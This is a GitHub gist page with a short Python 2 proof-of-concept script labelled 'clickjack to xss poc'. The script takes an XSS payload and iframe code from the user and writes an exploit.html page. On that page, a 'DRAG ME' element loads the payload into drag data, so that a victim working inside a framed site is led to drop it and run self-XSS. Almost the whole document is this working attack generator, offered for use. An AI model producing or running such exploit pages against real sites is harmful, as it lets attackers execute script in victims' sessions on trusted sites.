Skip to content

Instantly share code, notes, and snippets.

@flying0er
Forked from vishwaraj101/cxp.py
Created November 22, 2017 14:02
Show Gist options
  • Save flying0er/abc51c25c1a50b0a013aa329352ca22d to your computer and use it in GitHub Desktop.
Save flying0er/abc51c25c1a50b0a013aa329352ca22d to your computer and use it in GitHub Desktop.
clickjack to xss poc
print "Clickjack to Xss"
vector=raw_input('xss vector--> ') #xss payload
html=raw_input('Custom Iframe Code--> ') #custom iframe code
fo=open('exploit.html','w') #creating html file
source_code="""<html><body>
<h1>Clickjack to exploit self xss </h1>
<div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', '%s')"><h3>DRAG ME!!</h3></div>
"""%(vector)
fo.write(source_code)
fo=open('exploit.html','a')
fo.write(html)
fo.write('</body></html>')
fo.close() #closing the file
print "file created"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment